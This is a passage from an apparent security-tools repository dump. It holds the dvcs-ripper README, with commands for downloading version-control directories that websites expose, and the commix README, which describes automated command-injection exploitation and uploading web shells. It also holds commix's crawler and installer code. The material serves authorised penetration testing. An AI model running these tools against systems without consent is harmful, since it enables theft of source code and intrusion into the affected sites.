attrs) 106 | 107 | def SetConsoleCursorPosition(stream_id, position, adjust=True): 108 | position = COORD(*position) 109 | # If the position is out of range, do nothing. 110 | if position.Y <= 0 or position.X <= 0: 111 | return 112 | # Adjust for Windows' SetConsoleCursorPosition: 113 | # 1. being 0-based, while ANSI is 1-based. 114 | # 2. expecting (x,y), while ANSI uses (y,x). 115 | adjusted_position = COORD(position.Y - 1, position.X - 1) 116 | if adjust: 117 | # Adjust for viewport's scroll position 118 | sr = GetConsoleScreenBufferInfo(STDOUT).srWindow 119 | adjusted_position.Y += sr.Top 120 | adjusted_position.X += sr.Left 121 | # Resume normal processing 122 | handle = handles[stream_id] 123 | return _SetConsoleCursorPosition(handle, adjusted_position) 124 | 125 | def FillConsoleOutputCharacter(stream_id, char, length, start): 126 | handle = handles[stream_id] 127 | char = c_char(char.encode()) 128 | length = wintypes.DWORD(length) 129 | num_written = wintypes.DWORD(0) 130 | # Note that this is hard-coded for ANSI (vs wide) bytes. 131 | success = _FillConsoleOutputCharacterA( 132 | handle, char, length, start, byref(num_written)) 133 | return num_written.value 134 | 135 | def FillConsoleOutputAttribute(stream_id, attr, length, start): 136 | ''' FillConsoleOutputAttribute( hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten )''' 137 | handle = handles[stream_id] 138 | attribute = wintypes.WORD(attr) 139 | length = wintypes.DWORD(length) 140 | num_written = wintypes.DWORD(0) 141 | # Note that this is hard-coded for ANSI (vs wide) bytes. 
142 | return _FillConsoleOutputAttribute( 143 | handle, attribute, length, start, byref(num_written)) 144 | 145 | def SetConsoleTitle(title): 146 | return _SetConsoleTitleW(title) 147 | -------------------------------------------------------------------------------- /dvcs-ripper/README.md: -------------------------------------------------------------------------------- 1 | dvcs-ripper 2 | =========== 3 | 4 | Rip web accessible (distributed) version control systems: SVN, GIT, Mercurial/hg, bzr, ... 5 | 6 | It can rip repositories even when directory browsing is turned off. 7 | 8 | Make sure to position yourself in empty directory where you want repositories to be downloaded/cloned. 9 | 10 | ## Requirements 11 | 12 | - Perl 13 | - Perl modules: 14 | - required: LWP, IO::Socket::SSL 15 | - for newer SVN: DBD::SQlite and DBI 16 | - for faster GIT: Parallel::ForkManager, Redis and Algorithm::Combinatorics 17 | - (D)VCS client of what you want to rip (cvs, svn, git, hg, bzr, ...) 18 | 19 | ### Requirements on Debian/Ubuntu 20 | 21 | You can easily install perl requirements: 22 | 23 | `sudo apt-get install perl libio-socket-ssl-perl libdbd-sqlite3-perl libclass-dbi-perl libio-all-lwp-perl` 24 | 25 | Optional requirements (faster git rip): 26 | `sudo apt-get install libparallel-forkmanager-perl libredis-perl libalgorithm-combinatorics-perl` 27 | 28 | And if you need all clients supported: 29 | 30 | `sudo apt-get install cvs subversion git bzr mercurial` 31 | 32 | ## Docker 33 | 34 | In case you just want docker version, it is here: 35 | 36 | https://github.com/kost/docker-webscan/tree/master/alpine-dvcs-ripper 37 | 38 | Just say something like: 39 | 40 | `docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-git.pl -v -u http://www.example.org/.git` 41 | 42 | 43 | GIT 44 | =========== 45 | Example run (for git): 46 | 47 | `rip-git.pl -v -u http://www.example.com/.git/` 48 | 49 | It will automatically do `git checkout -f` 50 | 51 | or if you would 
like to ignore SSL certificate verification (with -s): 52 | 53 | `rip-git.pl -s -v -u http://www.example.com/.git/` 54 | 55 | Mercurial/HG 56 | =========== 57 | Example run (for hg): 58 | 59 | `rip-hg.pl -v -u http://www.example.com/.hg/` 60 | 61 | It will automatically do `hg revert ` 62 | 63 | or if you would like to ignore SSL certificate verification (with -s): 64 | 65 | `rip-hg.pl -s -v -u http://www.example.com/.hg/` 66 | 67 | Bazaar/bzr 68 | =========== 69 | Example run (for bzr): 70 | 71 | `rip-bzr.pl -v -u http://www.example.com/.bzr/` 72 | 73 | It will automatically do `bzr revert` 74 | 75 | or if you would like to ignore SSL certificate verification (with -s): 76 | 77 | `rip-bzr.pl -s -v -u http://www.example.com/.bzr/` 78 | 79 | 80 | SVN 81 | =========== 82 | It supports both the OLDER and the NEWER svn client format. The older format has .svn files in every directory, while 83 | the newer format has a single .svn directory with wc.db inside it. It will automatically detect which 84 | format is used on the target. 85 | 86 | Example run (for SVN): 87 | 88 | `rip-svn.pl -v -u http://www.example.com/.svn/` 89 | 90 | It will automatically do `svn revert -R .` 91 | 92 | CVS 93 | =========== 94 | Example run (for CVS): 95 | 96 | `rip-cvs.pl -v -u http://www.example.com/CVS/` 97 | 98 | This will not rip CVS, but it will display useful info.
99 | 100 | ## Advanced usage examples 101 | 102 | Some examples of how it can be used: 103 | 104 | ### Output handling 105 | 106 | Download the git tree to a specific output dir: 107 | 108 | `rip-git.pl -o /my/previously/made/dir -v -u http://www.example.com/.git/` 109 | 110 | Download the git tree to a specific output dir (creating dir `http__www.example.com_.git_` for url): 111 | 112 | `rip-git.pl -m -o /dir -v -u http://www.example.com/.git/` 113 | 114 | ### Redis usage with docker 115 | 116 | Create Redis docker container: 117 | 118 | `docker run --rm --name myredis -it -v /my/host/dir/data:/data:rw k0st/alpine-redis` 119 | 120 | In another terminal, just link the redis container and say something like this: 121 | 122 | `docker run --rm --link=myredis:redis -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-git.pl -e docker -v -u http://www.example.org/.git -m -o /work` 123 | 124 | ### Using redis for resuming work of ripping 125 | 126 | Create Redis docker container: 127 | 128 | `docker run --name redisdvcs -it -v /my/host/dir/data:/data:rw k0st/alpine-redis` 129 | 130 | In another terminal, just link the redis container and say something like this: 131 | 132 | `docker run --link=redisdvcs:redis -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-git.pl -n -e docker -v -u http://www.example.org/.git -m -o /work` 133 | 134 | ### Abusing redis for massively parallel tasks 135 | 136 | Create a global NFS share and mount /work on each client.
Create a global Redis docker container: 137 | 138 | `docker run --name redisdvcs -it -v /my/host/dir/data:/data:rw k0st/alpine-redis` 139 | 140 | In another terminal, just link the redis container and say something like this on the 1st client: 141 | 142 | `docker run -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-git.pl -n -e global.docker.ip -v -u http://www.example.org/.git -t 10 -c -m -o /work` 143 | 144 | In another terminal, just link the redis container and say something like this on the 2nd client: 145 | 146 | `docker run -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-git.pl -n -e global.docker.ip -v -u http://www.example.org/.git -t 10 -c -m -o /work` 147 | 148 | and so on... 149 | 150 | You need to perform `git checkout -f` yourself at the end - of course! 151 | 152 | ## Future 153 | 154 | Feel free to implement something and send a pull request. Feel free to suggest any feature. A lot of features 155 | were actually implemented by request. 156 | 157 | ### ToDo 158 | - [ ] Recognize 404 pages which return 200 in SVN/CVS 159 | - [ ] Try to repeat each trick after previous trick was successful 160 | - [ ] Progress bars 161 | 162 | ### Done 163 | - [x] Support for brute forcing pack names 164 | - [x] Intelligent guessing of packed refs 165 | - [x] Support for objects/info/packs from https://www.kernel.org/pub/software/scm/git/docs/gitrepository-layout.html 166 | - [x] Recognize 404 pages which return 200 167 | - [x] Introduce ignore SSL/TLS verification in SVN/CVS 168 | - [x] Bzr support 169 | 170 | -------------------------------------------------------------------------------- /commix/README.md: -------------------------------------------------------------------------------- 1 | [![Logo](https://camo.githubusercontent.com/41258687d868cf76951a37f6be7961c4c862dfb3/687474703a2f2f692e696d6775722e636f6d2f6c4b6762336c712e706e67)](http://commixproject.com) 2 | 3 | [![Build 
Status](https://api.travis-ci.org/commixproject/commix.svg?branch=master)](https://api.travis-ci.org/commixproject/commix) 4 | [![Version 1.9](https://img.shields.io/badge/Version-1.9-green.svg)](https://github.com/commixproject/commix/releases/tag/v1.9-20170502 5 | ) 6 | [![Python 2.6-2.7](https://img.shields.io/badge/Python-2.6--2.7-yellow.svg)](http://www.python.org/download/) 7 | [![GPLv3 License](https://img.shields.io/badge/License-GPLv3-red.svg)](https://github.com/commixproject/commix/blob/master/readme/COPYING) 8 | [![Twitter](https://img.shields.io/badge/Twitter-@commixproject-blue.svg)](http://www.twitter.com/commixproject) 9 | 10 | #### General Information 11 | 12 | **Commix** (short for [**comm**]and [**i**]njection e[**x**]ploiter) is an automated tool written by Anastasios Stasinopoulos ([@ancst](https://twitter.com/ancst)) that can be used by web developers, penetration testers or even security researchers in order to test web-based applications with a view to finding bugs, errors or vulnerabilities related to **[command injection](https://www.owasp.org/index.php/Command_Injection)** attacks. By using this tool, it is very easy to find and exploit a command injection vulnerability in a certain vulnerable parameter or HTTP header. 13 | 14 | #### Disclaimer 15 | 16 | This tool is only for testing and academic purposes and can only be used where strict consent has been given. Do not use it for illegal purposes! 17 | 18 | #### Requirements 19 | 20 | **[Python](http://www.python.org/download/)** version **2.6.x** or **2.7.x** is required for running this program. 21 | 22 | #### Installation 23 | 24 | Download commix by cloning the Git repository: 25 | 26 | git clone https://github.com/commixproject/commix.git commix 27 | 28 | Commix comes packaged in the **official repositories** of the following Linux distributions, so you can use the **package manager** to install it!
29 | 30 | - [ArchStrike](https://archstrike.org/) 31 | - [BlackArch Linux](http://blackarch.org/) 32 | - [BackBox](https://backbox.org/) 33 | - [Kali Linux](https://www.kali.org/) 34 | - [Parrot Security OS](https://www.parrotsec.org/) 35 | - [Weakerthan Linux](http://www.weaknetlabs.com/) 36 | 37 | Commix also comes **as a plugin**, on the following penetration testing frameworks: 38 | 39 | - [TrustedSec's Penetration Testers Framework (PTF)](https://github.com/trustedsec/ptf) 40 | - [OWASP Offensive Web Testing Framework (OWTF)](https://github.com/owtf/owtf) 41 | - [CTF-Tools](https://github.com/zardus/ctf-tools) 42 | - [PentestBox](https://tools.pentestbox.com/) 43 | - [PenBox](https://github.com/x3omdax/PenBox) 44 | - [Katoolin](https://github.com/LionSec/katoolin) 45 | - [Aptive's Penetration Testing tools](https://github.com/Aptive/penetration-testing-tools) 46 | - [Homebrew Tap - Pen Test Tools ](https://github.com/sidaf/homebrew-pentest) 47 | 48 | #### Supported Platforms 49 | 50 | - Linux 51 | - Mac OS X 52 | - Windows (experimental) 53 | 54 | #### Usage 55 | 56 | To get a list of all options and switches use: 57 | 58 | python commix.py -h 59 | 60 | **Q**: Where can I check all the available options and switches? 61 | 62 | **A**: Check the '**[usage](https://github.com/commixproject/commix/wiki/Usage)**' wiki page. 63 | 64 | #### Usage Examples 65 | 66 | **Q**: Can I get some basic ideas on how to use commix? 67 | 68 | **A**: Just go and check the '**[usage examples](https://github.com/commixproject/commix/wiki/Usage-Examples)**' wiki page, where there are several test cases and attack scenarios. 69 | 70 | #### Upload Shells 71 | 72 | **Q**: How easily can I upload web-shells on a target host via commix? 73 | 74 | **A**: Commix enables you to upload web-shells (e.g metasploit PHP meterpreter) easily on target host. For more, check the '**[upload shells](https://github.com/commixproject/commix/wiki/Upload-shells)**' wiki page. 
75 | 76 | #### Modules Development 77 | 78 | **Q**: Do you want to increase the capabilities of the commix tool and/or to adapt it to your needs? 79 | 80 | **A**: You can easily develop and import your own modules. For more, check the '**[module development](https://github.com/commixproject/commix/wiki/Module-Development)**' wiki page. 81 | 82 | #### Command Injection Testbeds 83 | 84 | **Q**: How can I test or evaluate the exploitation abilities of commix? 85 | 86 | **A**: Check the '**[command injection testbeds](https://github.com/commixproject/commix/wiki/Command-Injection-Testbeds)**' wiki page which includes a collection of pwnable web applications and/or VMs (that include web applications) vulnerable to command injection attacks. 87 | 88 | #### Exploitation Demos 89 | 90 | **Q**: Is there a place where I can check for demos of commix? 91 | 92 | **A**: If you want to see a collection of demos of the exploitation abilities of commix, take a look at the '**[exploitation demos](https://github.com/commixproject/commix/wiki/Exploitation-Demos)**' wiki page. 93 | 94 | #### Bugs and Enhancements 95 | 96 | **Q**: I found a bug / I want to suggest a new feature! What can I do? 97 | 98 | **A**: For bug reports or enhancements, please open an issue **[here](https://github.com/commixproject/commix/issues)**. 99 | 100 | #### Presentations and White Papers 101 | **Q**: Is there a place where I can find presentations and/or white papers regarding commix? 102 | 103 | **A**: For presentations and/or white papers published in conferences, check the '**[presentations](https://github.com/commixproject/commix/wiki/Presentations)**' wiki page. 104 | 105 | #### Support and Donations 106 | **Q**: Apart from tech stuff (bug reports or enhancements), is there any other way that I can support the development of commix? 107 | 108 | **A**: Sure! Commix is the outcome of many hours of work and total personal dedication.
Feel free to '**[donate](https://www.paypal.com/gr/webapps/mpp/send-money-online)**' via PayPal to `donations@commixproject.com` and instantly prove your feelings for it! :). -------------------------------------------------------------------------------- /commix/src/utils/crawler.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import re 17 | import sys 18 | import urllib 19 | import urllib2 20 | import urlparse 21 | 22 | from src.utils import menu 23 | from src.utils import settings 24 | from src.core.requests import headers 25 | from src.thirdparty.colorama import Fore, Back, Style, init 26 | from src.thirdparty.beautifulsoup.beautifulsoup import BeautifulSoup 27 | 28 | """ 29 | Do a request to target URL. 30 | """ 31 | def request(url): 32 | # Check if defined POST data 33 | if menu.options.data: 34 | request = urllib2.Request(url, menu.options.data) 35 | else: 36 | request = urllib2.Request(url) 37 | headers.do_check(request) 38 | response = urllib2.urlopen(request) 39 | soup = BeautifulSoup(response) 40 | return soup 41 | 42 | """ 43 | Check for URLs in sitemap.xml. 44 | """ 45 | def sitemap(url): 46 | if not url.endswith(".xml"): 47 | url = urlparse.urljoin(url, "/sitemap.xml") 48 | try: 49 | soup = request(url) 50 | href_list = [] 51 | for match in soup.findAll("loc"): 52 | href_list.append(match.text) 53 | return href_list 54 | except: 55 | warn_msg = "The 'sitemap.xml' not found." 
56 | print settings.print_warning_msg(warn_msg) 57 | return "" 58 | 59 | """ 60 | Grab the crawled hrefs. 61 | """ 62 | def crawling(url): 63 | soup = request(url) 64 | href_list = [] 65 | for tag in soup.findAll('a', href=True): 66 | tag['href'] = urlparse.urljoin(url, tag['href']) 67 | o = urlparse.urlparse(url) 68 | if o.netloc in tag['href'] : 69 | href_list.append(tag['href']) 70 | return href_list 71 | 72 | """ 73 | The crawing process. 74 | """ 75 | def do_process(url): 76 | crawled_href = crawling(url) 77 | if menu.options.DEFAULT_CRAWLDEPTH_LEVEL == 1: 78 | return crawled_href 79 | else: 80 | for url in crawled_href: 81 | crawled_href = crawling(url) 82 | return crawled_href 83 | 84 | """ 85 | The main crawler. 86 | """ 87 | def crawler(url): 88 | if not menu.options.sitemap_url: 89 | info_msg = "Starting crawler and searching for " 90 | info_msg += "links with depth " + str(menu.options.DEFAULT_CRAWLDEPTH_LEVEL) + "." 91 | print settings.print_info_msg(info_msg) 92 | 93 | while True: 94 | if not menu.options.sitemap_url: 95 | if not menu.options.batch: 96 | question_msg = "Do you want to check target for " 97 | question_msg += "the existence of 'sitemap.xml'? [Y/n] > " 98 | sys.stdout.write(settings.print_question_msg(question_msg)) 99 | sitemap_check = sys.stdin.readline().replace("\n","").lower() 100 | else: 101 | sitemap_check = "" 102 | if len(sitemap_check) == 0: 103 | sitemap_check = "y" 104 | if sitemap_check in settings.CHOICE_YES: 105 | sitemap_check = True 106 | break 107 | elif sitemap_check in settings.CHOICE_NO: 108 | sitemap_check = False 109 | break 110 | elif sitemap_check in settings.CHOICE_QUIT: 111 | sys.exit(0) 112 | else: 113 | err_msg = "'" + sitemap_check + "' is not a valid answer." 
114 | print settings.print_error_msg(err_msg) 115 | pass 116 | else: 117 | sitemap_check = True 118 | break 119 | 120 | if sitemap_check: 121 | output_href = sitemap(url) 122 | sitemap_check = output_href 123 | for recursion in output_href: 124 | if recursion.endswith(".xml") and "sitemap" in recursion.lower(): 125 | while True: 126 | warn_msg = "A sitemap recursion was detected " + "'" + recursion + "'." 127 | print settings.print_warning_msg(warn_msg) 128 | if not menu.options.batch: 129 | question_msg = "Do you want to follow the detected recursion? [Y/n] > " 130 | sys.stdout.write(settings.print_question_msg(question_msg)) 131 | sitemap_check = sys.stdin.readline().replace("\n","").lower() 132 | else: 133 | sitemap_check = "" 134 | if len(sitemap_check) == 0: 135 | sitemap_check = "y" 136 | if sitemap_check in settings.CHOICE_YES: 137 | output_href = sitemap(recursion) 138 | sitemap_check = output_href 139 | break 140 | elif sitemap_check in settings.CHOICE_NO: 141 | break 142 | elif sitemap_check in settings.CHOICE_QUIT: 143 | sys.exit(0) 144 | else: 145 | err_msg = "'" + sitemap_check + "' is not a valid answer." 146 | print settings.print_error_msg(err_msg) 147 | pass 148 | 149 | if not sitemap_check: 150 | output_href = do_process(url) 151 | 152 | info_msg = "Checking " 153 | if sitemap_check: 154 | info_msg += "targets's sitemap.xml " 155 | info_msg += "for usable links with GET parameters... " 156 | sys.stdout.write(settings.print_info_msg(info_msg)) 157 | sys.stdout.flush() 158 | 159 | succeed_banner = True 160 | valid_url_found = False 161 | for check_url in output_href: 162 | # Check for usable URL with GET parameters 163 | if re.search(settings.GET_PARAMETERS_REGEX, check_url): 164 | valid_url_found = True 165 | if succeed_banner: 166 | print "[ " + Fore.GREEN + "SUCCEED" + Style.RESET_ALL + " ]" 167 | print settings.print_success_msg(check_url) 168 | if not menu.options.batch: 169 | question_msg = "Do you want to use this URL to perform tests? 
[Y/n] > " 170 | sys.stdout.write(settings.print_question_msg(question_msg)) 171 | use_url = sys.stdin.readline().replace("\n","").lower() 172 | else: 173 | use_url = "" 174 | if len(use_url) == 0: 175 | use_url = "y" 176 | if use_url in settings.CHOICE_YES: 177 | return check_url 178 | elif use_url in settings.CHOICE_NO: 179 | succeed_banner = False 180 | pass 181 | elif gotshell in settings.CHOICE_QUIT: 182 | sys.exit(0) 183 | 184 | if not valid_url_found: 185 | print "[ " + Fore.RED + "FAILED" + Style.RESET_ALL + " ]" 186 | return url 187 | 188 | # eof -------------------------------------------------------------------------------- /commix/src/utils/install.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | import os 17 | import sys 18 | import platform 19 | import subprocess 20 | 21 | from src.utils import settings 22 | from src.utils import requirments 23 | from src.thirdparty.colorama import Fore, Back, Style, init 24 | 25 | """ 26 | Make a local installation of 'commix' on your system. 27 | """ 28 | 29 | """ 30 | The un-installer. 31 | """ 32 | def uninstaller(): 33 | info_msg = "Starting the uninstaller... 
" 34 | sys.stdout.write(settings.print_info_msg(info_msg)) 35 | sys.stdout.flush() 36 | try: 37 | subprocess.Popen("rm -rf /usr/bin/" + settings.APPLICATION + " >/dev/null 2>&1", shell=True).wait() 38 | subprocess.Popen("rm -rf /usr/share/" + settings.APPLICATION + " >/dev/null 2>&1", shell=True).wait() 39 | except: 40 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 41 | sys.exit(0) 42 | 43 | sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n") 44 | sys.stdout.flush() 45 | success_msg = "The un-installation of commix has finished!" 46 | print settings.print_success_msg(success_msg) 47 | 48 | """ 49 | The installer. 50 | """ 51 | def installer(): 52 | packages = "build-essential python-dev" 53 | dependencies = "git python-pip" 54 | 55 | info_msg = "Starting the installer... " 56 | sys.stdout.write(settings.print_info_msg(info_msg)) 57 | sys.stdout.flush() 58 | 59 | # Check if OS is Linux. 60 | if platform.system() == "Linux": 61 | 62 | # You need to have root privileges to run this script 63 | if os.geteuid() != 0: 64 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 65 | err_msg = "You need to have root privileges to run this option!" 66 | print settings.print_critical_msg(err_msg) 67 | sys.exit(0) 68 | 69 | # Check if commix is already installed. 70 | if os.path.isdir("/usr/share/" + settings.APPLICATION + ""): 71 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 72 | warn_msg = "It seems that " + settings.APPLICATION 73 | warn_msg += " is already installed in your system." 74 | print settings.print_warning_msg(warn_msg) 75 | while True: 76 | if not menu.options.batch: 77 | question_msg = "Do you want to remove commix? 
[Y/n] > " 78 | sys.stdout.write(settings.print_question_msg(question_msg)) 79 | uninstall = sys.stdin.readline().replace("\n","").lower() 80 | else: 81 | uninstall = "" 82 | if len(uninstall) == 0: 83 | uninstall = "y" 84 | if uninstall in settings.CHOICE_YES: 85 | uninstaller() 86 | sys.exit(0) 87 | elif uninstall in settings.CHOICE_NO or \ 88 | uninstall in settings.CHOICE_QUIT: 89 | sys.exit(0) 90 | else: 91 | err_msg = "'" + uninstall + "' is not a valid answer." 92 | print settings.print_error_msg(err_msg) 93 | pass 94 | 95 | # Check for git. 96 | if not os.path.isfile("/usr/bin/git") or not os.path.isfile("/usr/bin/pip"): 97 | # Install requirement. 98 | if os.path.isfile("/etc/apt/sources.list"): 99 | sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n") 100 | sys.stdout.flush() 101 | # Check for dependencies. 102 | dependencies_items = dependencies.split() 103 | for item in dependencies_items: 104 | requirments.do_check(item) 105 | else: 106 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 107 | err_msg = "The installer is not designed for any " 108 | err_msg += "other Linux distro than Ubuntu / Debian." 109 | print settings.print_critical_msg(err_msg) 110 | err_msg = " Please install manually: " + dependencies 111 | print Back.RED + err_msg + Style.RESET_ALL 112 | print "" 113 | sys.exit(0) 114 | 115 | # Force install of necessary packages 116 | subprocess.Popen("apt-get --force-yes -y install " + packages + ">/dev/null 2>&1", shell=True).wait() 117 | sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n") 118 | sys.stdout.flush() 119 | 120 | info_msg = "Installing " + settings.APPLICATION 121 | info_msg += " into the /usr/share/" + settings.APPLICATION + "... 
" 122 | sys.stdout.write(settings.print_info_msg(info_msg)) 123 | try: 124 | current_dir = os.getcwd() 125 | subprocess.Popen("cp -r " + current_dir + " /usr/share/" + settings.APPLICATION + " >/dev/null 2>&1", shell=True).wait() 126 | subprocess.Popen("chmod 775 /usr/share/" + settings.APPLICATION + "/" + settings.APPLICATION + ".py >/dev/null 2>&1", shell=True).wait() 127 | except: 128 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 129 | sys.exit(0) 130 | sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n") 131 | sys.stdout.flush() 132 | 133 | info_msg = "Installing " + settings.APPLICATION 134 | info_msg += " to /usr/bin/" + settings.APPLICATION + "... " 135 | sys.stdout.write(settings.print_info_msg(info_msg)) 136 | try: 137 | with open("/usr/bin/" + settings.APPLICATION, 'w') as f: 138 | f.write('#!/bin/bash\n') 139 | f.write('cd /usr/share/commix/ && ./commix.py "$@"\n') 140 | subprocess.Popen("chmod +x /usr/bin/" + settings.APPLICATION + " >/dev/null 2>&1", shell=True).wait() 141 | except: 142 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 143 | sys.exit(0) 144 | sys.stdout.write("[" + Fore.GREEN + " SUCCEED " + Style.RESET_ALL + "]\n") 145 | sys.stdout.flush() 146 | 147 | #Create the Output Directory 148 | OUTPUT_DIR = ".output/" 149 | try: 150 | os.stat(OUTPUT_DIR) 151 | except: 152 | os.mkdir(OUTPUT_DIR) 153 | 154 | success_msg = "The installation is finished! Type '" 155 | success_msg += settings.APPLICATION + "' to launch it." 156 | print settings.print_success_msg(success_msg) 157 | 158 | else : 159 | print "[" + Fore.RED + " FAILED " + Style.RESET_ALL + "]" 160 | err_msg = "The installer is not designed for any other system other than Linux." 
161 | print settings.print_critical_msg(err_msg) 162 | err_msg = " Please install manually: " + packages + dependencies 163 | print settings.print_critical_msg(err_msg) 164 | print "" 165 | sys.exit(0) 166 | 167 | #eof -------------------------------------------------------------------------------- /commix/src/thirdparty/colorama/winterm.py: -------------------------------------------------------------------------------- 1 | # Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. 2 | from . import win32 3 | 4 | 5 | # from wincon.h 6 | class WinColor(object): 7 | BLACK = 0 8 | BLUE = 1 9 | GREEN = 2 10 | CYAN = 3 11 | RED = 4 12 | MAGENTA = 5 13 | YELLOW = 6 14 | GREY = 7 15 | 16 | # from wincon.h 17 | class WinStyle(object): 18 | NORMAL = 0x00 # dim text, dim background 19 | BRIGHT = 0x08 # bright text, dim background 20 | BRIGHT_BACKGROUND = 0x80 # dim text, bright background 21 | 22 | class WinTerm(object): 23 | 24 | def __init__(self): 25 | self._default = win32.GetConsoleScreenBufferInfo(win32.STDOUT).wAttributes 26 | self.set_attrs(self._default) 27 | self._default_fore = self._fore 28 | self._default_back = self._back 29 | self._default_style = self._style 30 | # In order to emulate LIGHT_EX in windows, we borrow the BRIGHT style. 31 | # So that LIGHT_EX colors and BRIGHT style do not clobber each other, 32 | # we track them separately, since LIGHT_EX is overwritten by Fore/Back 33 | # and BRIGHT is overwritten by Style codes. 
34 | self._light = 0 35 | 36 | def get_attrs(self): 37 | return self._fore + self._back * 16 + (self._style | self._light) 38 | 39 | def set_attrs(self, value): 40 | self._fore = value & 7 41 | self._back = (value >> 4) & 7 42 | self._style = value & (WinStyle.BRIGHT | WinStyle.BRIGHT_BACKGROUND) 43 | 44 | def reset_all(self, on_stderr=None): 45 | self.set_attrs(self._default) 46 | self.set_console(attrs=self._default) 47 | 48 | def fore(self, fore=None, light=False, on_stderr=False): 49 | if fore is None: 50 | fore = self._default_fore 51 | self._fore = fore 52 | # Emulate LIGHT_EX with BRIGHT Style 53 | if light: 54 | self._light |= WinStyle.BRIGHT 55 | else: 56 | self._light &= ~WinStyle.BRIGHT 57 | self.set_console(on_stderr=on_stderr) 58 | 59 | def back(self, back=None, light=False, on_stderr=False): 60 | if back is None: 61 | back = self._default_back 62 | self._back = back 63 | # Emulate LIGHT_EX with BRIGHT_BACKGROUND Style 64 | if light: 65 | self._light |= WinStyle.BRIGHT_BACKGROUND 66 | else: 67 | self._light &= ~WinStyle.BRIGHT_BACKGROUND 68 | self.set_console(on_stderr=on_stderr) 69 | 70 | def style(self, style=None, on_stderr=False): 71 | if style is None: 72 | style = self._default_style 73 | self._style = style 74 | self.set_console(on_stderr=on_stderr) 75 | 76 | def set_console(self, attrs=None, on_stderr=False): 77 | if attrs is None: 78 | attrs = self.get_attrs() 79 | handle = win32.STDOUT 80 | if on_stderr: 81 | handle = win32.STDERR 82 | win32.SetConsoleTextAttribute(handle, attrs) 83 | 84 | def get_position(self, handle): 85 | position = win32.GetConsoleScreenBufferInfo(handle).dwCursorPosition 86 | # Because Windows coordinates are 0-based, 87 | # and win32.SetConsoleCursorPosition expects 1-based. 88 | position.X += 1 89 | position.Y += 1 90 | return position 91 | 92 | def set_cursor_position(self, position=None, on_stderr=False): 93 | if position is None: 94 | # I'm not currently tracking the position, so there is no default. 
95 | # position = self.get_position() 96 | return 97 | handle = win32.STDOUT 98 | if on_stderr: 99 | handle = win32.STDERR 100 | win32.SetConsoleCursorPosition(handle, position) 101 | 102 | def cursor_adjust(self, x, y, on_stderr=False): 103 | handle = win32.STDOUT 104 | if on_stderr: 105 | handle = win32.STDERR 106 | position = self.get_position(handle) 107 | adjusted_position = (position.Y + y, position.X + x) 108 | win32.SetConsoleCursorPosition(handle, adjusted_position, adjust=False) 109 | 110 | def erase_screen(self, mode=0, on_stderr=False): 111 | # 0 should clear from the cursor to the end of the screen. 112 | # 1 should clear from the cursor to the beginning of the screen. 113 | # 2 should clear the entire screen, and move cursor to (1,1) 114 | handle = win32.STDOUT 115 | if on_stderr: 116 | handle = win32.STDERR 117 | csbi = win32.GetConsoleScreenBufferInfo(handle) 118 | # get the number of character cells in the current buffer 119 | cells_in_screen = csbi.dwSize.X * csbi.dwSize.Y 120 | # get number of character cells before current cursor position 121 | cells_before_cursor = csbi.dwSize.X * csbi.dwCursorPosition.Y + csbi.dwCursorPosition.X 122 | if mode == 0: 123 | from_coord = csbi.dwCursorPosition 124 | cells_to_erase = cells_in_screen - cells_before_cursor 125 | if mode == 1: 126 | from_coord = win32.COORD(0, 0) 127 | cells_to_erase = cells_before_cursor 128 | elif mode == 2: 129 | from_coord = win32.COORD(0, 0) 130 | cells_to_erase = cells_in_screen 131 | # fill the entire screen with blanks 132 | win32.FillConsoleOutputCharacter(handle, ' ', cells_to_erase, from_coord) 133 | # now set the buffer's attributes accordingly 134 | win32.FillConsoleOutputAttribute(handle, self.get_attrs(), cells_to_erase, from_coord) 135 | if mode == 2: 136 | # put the cursor where needed 137 | win32.SetConsoleCursorPosition(handle, (1, 1)) 138 | 139 | def erase_line(self, mode=0, on_stderr=False): 140 | # 0 should clear from the cursor to the end of the line. 
